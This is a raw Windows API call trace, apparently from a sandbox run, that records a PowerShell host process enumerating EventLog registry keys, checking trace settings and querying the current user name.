	[0484.245] RegEnumValueW (in: hKey=0x2f8, dwIndex=0x1, lpValueName=0x43c750, lpcchValueName=0x1ed278, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1ed278, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0484.245] CoTaskMemFree (pv=0x43c750) 
	[0484.246] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0484.246] RegEnumValueW (in: hKey=0x2f8, dwIndex=0x2, lpValueName=0x43c750, lpcchValueName=0x1ed278, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1ed278, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0484.246] CoTaskMemFree (pv=0x43c750) 
	[0484.246] RegQueryValueExW (in: hKey=0x2f8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ed25c, lpData=0x0, lpcbData=0x1ed258*=0x0 | out: lpType=0x1ed25c*=0x1, lpData=0x0, lpcbData=0x1ed258*=0x8) returned 0x0
	[0484.246] CoTaskMemAlloc (cb=0xc) returned 0x4a9b80
	[0484.246] RegQueryValueExW (in: hKey=0x2f8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ed22c, lpData=0x4a9b80, lpcbData=0x1ed228*=0x8 | out: lpType=0x1ed22c*=0x1, lpData="2.0", lpcbData=0x1ed228*=0x8) returned 0x0
	[0484.246] CoTaskMemFree (pv=0x4a9b80) 
	[0484.247] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0484.247] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0484.247] CoTaskMemFree (pv=0x484630) 
	[0484.252] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0484.252] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0484.252] CoTaskMemFree (pv=0x484630) 
	[0484.257] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2f8 | out: phkResult=0x1ed2f8*=0x2fc) returned 0x0
	[0484.259] RegQueryInfoKeyW (in: hKey=0x2fc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ed26c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ed268, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ed26c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ed268*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.259] CoTaskMemFree (pv=0x0) 
	[0484.260] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0484.260] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x0, lpName=0x43c750, lpcchName=0x1ed2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ed2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.260] CoTaskMemFree (pv=0x43c750) 
	[0484.260] CoTaskMemFree (pv=0x0) 
	[0484.260] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0484.260] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x1, lpName=0x43c750, lpcchName=0x1ed2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ed2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.261] CoTaskMemFree (pv=0x43c750) 
	[0484.261] CoTaskMemFree (pv=0x0) 
	[0484.261] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0484.261] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x2, lpName=0x43c750, lpcchName=0x1ed2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ed2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.261] CoTaskMemFree (pv=0x43c750) 
	[0484.261] CoTaskMemFree (pv=0x0) 
	[0484.261] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0484.261] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x3, lpName=0x43c750, lpcchName=0x1ed2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ed2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.261] CoTaskMemFree (pv=0x43c750) 
	[0484.261] CoTaskMemFree (pv=0x0) 
	[0484.261] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0484.261] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x4, lpName=0x43c750, lpcchName=0x1ed2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ed2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.261] CoTaskMemFree (pv=0x43c750) 
	[0484.261] CoTaskMemFree (pv=0x0) 
	[0484.261] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0484.261] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x5, lpName=0x43c750, lpcchName=0x1ed2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ed2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.261] CoTaskMemFree (pv=0x43c750) 
	[0484.261] CoTaskMemFree (pv=0x0) 
	[0484.261] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0484.262] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x6, lpName=0x43c750, lpcchName=0x1ed2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ed2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.262] CoTaskMemFree (pv=0x43c750) 
	[0484.262] CoTaskMemFree (pv=0x0) 
	[0484.262] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0484.262] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x7, lpName=0x43c750, lpcchName=0x1ed2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ed2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.262] CoTaskMemFree (pv=0x43c750) 
	[0484.262] CoTaskMemFree (pv=0x0) 
	[0484.262] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0484.262] RegEnumKeyExW (in: hKey=0x2fc, dwIndex=0x8, lpName=0x43c750, lpcchName=0x1ed2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ed2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.262] CoTaskMemFree (pv=0x43c750) 
	[0484.262] CoTaskMemFree (pv=0x0) 
	[0484.262] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed358 | out: phkResult=0x1ed358*=0x300) returned 0x0
	[0484.262] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed358 | out: phkResult=0x1ed358*=0x0) returned 0x2
	[0484.262] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed358 | out: phkResult=0x1ed358*=0x1c4) returned 0x0
	[0484.262] RegOpenKeyExW (in: hKey=0x1c4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed358 | out: phkResult=0x1ed358*=0x0) returned 0x2
	[0484.263] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed358 | out: phkResult=0x1ed358*=0x324) returned 0x0
	[0484.263] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed358 | out: phkResult=0x1ed358*=0x0) returned 0x2
	[0484.263] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed358 | out: phkResult=0x1ed358*=0x328) returned 0x0
	[0484.263] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed358 | out: phkResult=0x1ed358*=0x0) returned 0x2
	[0484.263] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed358 | out: phkResult=0x1ed358*=0x32c) returned 0x0
	[0484.263] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed358 | out: phkResult=0x1ed358*=0x0) returned 0x2
	[0484.263] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed358 | out: phkResult=0x1ed358*=0x330) returned 0x0
	[0484.263] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed358 | out: phkResult=0x1ed358*=0x0) returned 0x2
	[0484.263] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed358 | out: phkResult=0x1ed358*=0x334) returned 0x0
	[0484.263] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed358 | out: phkResult=0x1ed358*=0x0) returned 0x2
	[0484.264] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed358 | out: phkResult=0x1ed358*=0x338) returned 0x0
	[0484.264] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed358 | out: phkResult=0x1ed358*=0x0) returned 0x2
	[0485.070] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed358 | out: phkResult=0x1ed358*=0x2d8) returned 0x0
	[0485.070] RegOpenKeyExW (in: hKey=0x2d8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed358 | out: phkResult=0x1ed358*=0x334) returned 0x0
	[0485.070] RegCloseKey (hKey=0x334) returned 0x0
	[0485.070] RegCloseKey (hKey=0x2fc) returned 0x0
	[0485.071] RegCloseKey (hKey=0x2d8) returned 0x0
	[0485.083] CoTaskMemAlloc (cb=0x804) returned 0x1b84fd80
	[0485.084] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b84fd80, nSize=0x1ed568 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed568) returned 0x1
	[0485.085] CoTaskMemFree (pv=0x1b84fd80) 
	[0485.086] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0485.086] GetUserNameW (in: lpBuffer=0x43c750, pcbBuffer=0x1ed5a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed5a8) returned 1
	[0485.087] CoTaskMemFree (pv=0x43c750) 
	[0485.957] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x338) returned 0x0
	[0485.957] RegQueryInfoKeyW (in: hKey=0x338, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ed21c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ed218, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ed21c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ed218*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0485.957] CoTaskMemFree (pv=0x0) 
	[0485.957] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0485.957] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x0, lpName=0x43c750, lpcchName=0x1ed2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ed2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0485.957] CoTaskMemFree (pv=0x43c750) 
	[0485.957] CoTaskMemFree (pv=0x0) 
	[0485.957] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0485.957] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x1, lpName=0x43c750, lpcchName=0x1ed2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ed2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0485.957] CoTaskMemFree (pv=0x43c750) 
	[0485.957] CoTaskMemFree (pv=0x0) 
	[0485.957] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0485.958] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x2, lpName=0x43c750, lpcchName=0x1ed2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ed2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0485.958] CoTaskMemFree (pv=0x43c750) 
	[0485.958] CoTaskMemFree (pv=0x0) 
	[0485.958] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0485.958] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x3, lpName=0x43c750, lpcchName=0x1ed2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ed2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0485.958] CoTaskMemFree (pv=0x43c750) 
	[0485.958] CoTaskMemFree (pv=0x0) 
	[0485.958] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0485.958] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x4, lpName=0x43c750, lpcchName=0x1ed2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ed2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0485.958] CoTaskMemFree (pv=0x43c750) 
	[0485.958] CoTaskMemFree (pv=0x0) 
	[0485.958] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0485.958] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x5, lpName=0x43c750, lpcchName=0x1ed2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ed2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0485.958] CoTaskMemFree (pv=0x43c750) 
	[0485.958] CoTaskMemFree (pv=0x0) 
	[0486.724] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0486.724] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x6, lpName=0x43c750, lpcchName=0x1ed2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ed2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0486.724] CoTaskMemFree (pv=0x43c750) 
	[0486.724] CoTaskMemFree (pv=0x0) 
	[0486.724] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0486.724] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x7, lpName=0x43c750, lpcchName=0x1ed2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ed2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0486.724] CoTaskMemFree (pv=0x43c750) 
	[0486.724] CoTaskMemFree (pv=0x0) 
	[0486.724] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0486.724] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x8, lpName=0x43c750, lpcchName=0x1ed2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ed2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0486.724] CoTaskMemFree (pv=0x43c750) 
	[0486.724] CoTaskMemFree (pv=0x0) 
	[0486.724] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed308 | out: phkResult=0x1ed308*=0x320) returned 0x0
	[0486.724] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed308 | out: phkResult=0x1ed308*=0x0) returned 0x2
	[0486.724] RegOpenKeyExW (in: hKey=0x338, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed308 | out: phkResult=0x1ed308*=0x2f8) returned 0x0
	[0486.725] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed308 | out: phkResult=0x1ed308*=0x0) returned 0x2
	[0486.725] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed308 | out: phkResult=0x1ed308*=0x300) returned 0x0
	[0486.725] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed308 | out: phkResult=0x1ed308*=0x0) returned 0x2
	[0486.725] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed308 | out: phkResult=0x1ed308*=0x1c4) returned 0x0
	[0486.725] RegOpenKeyExW (in: hKey=0x1c4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed308 | out: phkResult=0x1ed308*=0x0) returned 0x2
	[0486.725] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed308 | out: phkResult=0x1ed308*=0x324) returned 0x0
	[0486.725] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed308 | out: phkResult=0x1ed308*=0x0) returned 0x2
	[0486.725] RegOpenKeyExW (in: hKey=0x338, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed308 | out: phkResult=0x1ed308*=0x328) returned 0x0
	[0486.725] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed308 | out: phkResult=0x1ed308*=0x0) returned 0x2
	[0486.726] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed308 | out: phkResult=0x1ed308*=0x33c) returned 0x0
	[0486.726] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed308 | out: phkResult=0x1ed308*=0x0) returned 0x2
	[0486.726] RegOpenKeyExW (in: hKey=0x338, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed308 | out: phkResult=0x1ed308*=0x340) returned 0x0
	[0486.726] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed308 | out: phkResult=0x1ed308*=0x0) returned 0x2
	[0486.726] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed308 | out: phkResult=0x1ed308*=0x344) returned 0x0
	[0486.726] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed308 | out: phkResult=0x1ed308*=0x348) returned 0x0
	[0486.726] RegCloseKey (hKey=0x348) returned 0x0
	[0486.727] RegCloseKey (hKey=0x338) returned 0x0
	[0486.727] RegCloseKey (hKey=0x344) returned 0x0
	[0486.728] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x344) returned 0x0
	[0486.728] RegQueryInfoKeyW (in: hKey=0x344, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ed21c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ed218, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ed21c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ed218*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0486.728] CoTaskMemFree (pv=0x0) 
	[0486.728] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0486.728] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x0, lpName=0x43c750, lpcchName=0x1ed2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ed2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0486.728] CoTaskMemFree (pv=0x43c750) 
	[0486.728] CoTaskMemFree (pv=0x0) 
	[0486.728] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0486.728] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x1, lpName=0x43c750, lpcchName=0x1ed2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ed2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0486.728] CoTaskMemFree (pv=0x43c750) 
	[0486.728] CoTaskMemFree (pv=0x0) 
	[0486.728] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0486.728] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x2, lpName=0x43c750, lpcchName=0x1ed2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ed2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0486.728] CoTaskMemFree (pv=0x43c750) 
	[0486.729] CoTaskMemFree (pv=0x0) 
	[0486.729] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0486.731] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x3, lpName=0x43c750, lpcchName=0x1ed2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ed2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0486.732] CoTaskMemFree (pv=0x43c750) 
	[0486.732] CoTaskMemFree (pv=0x0) 
	[0486.732] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0486.732] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x4, lpName=0x43c750, lpcchName=0x1ed2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ed2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0486.732] CoTaskMemFree (pv=0x43c750) 
	[0486.732] CoTaskMemFree (pv=0x0) 
	[0486.732] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0486.732] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x5, lpName=0x43c750, lpcchName=0x1ed2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ed2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0486.732] CoTaskMemFree (pv=0x43c750) 
	[0486.732] CoTaskMemFree (pv=0x0) 
	[0486.732] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0486.732] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x6, lpName=0x43c750, lpcchName=0x1ed2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ed2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0486.732] CoTaskMemFree (pv=0x43c750) 
	[0486.732] CoTaskMemFree (pv=0x0) 
	[0486.732] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0486.732] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x7, lpName=0x43c750, lpcchName=0x1ed2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ed2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0486.732] CoTaskMemFree (pv=0x43c750) 
	[0486.732] CoTaskMemFree (pv=0x0) 
	[0486.732] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0486.732] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x8, lpName=0x43c750, lpcchName=0x1ed2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ed2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0486.733] CoTaskMemFree (pv=0x43c750) 
	[0486.733] CoTaskMemFree (pv=0x0) 
	[0486.733] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed308 | out: phkResult=0x1ed308*=0x338) returned 0x0
	[0486.733] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed308 | out: phkResult=0x1ed308*=0x0) returned 0x2
	[0486.733] RegOpenKeyExW (in: hKey=0x344, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed308 | out: phkResult=0x1ed308*=0x348) returned 0x0
	[0486.733] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed308 | out: phkResult=0x1ed308*=0x0) returned 0x2
	[0486.733] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed308 | out: phkResult=0x1ed308*=0x34c) returned 0x0
	[0486.733] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed308 | out: phkResult=0x1ed308*=0x0) returned 0x2
	[0486.733] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed308 | out: phkResult=0x1ed308*=0x350) returned 0x0
	[0486.733] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed308 | out: phkResult=0x1ed308*=0x0) returned 0x2
	[0486.734] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed308 | out: phkResult=0x1ed308*=0x354) returned 0x0
	[0486.734] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed308 | out: phkResult=0x1ed308*=0x0) returned 0x2
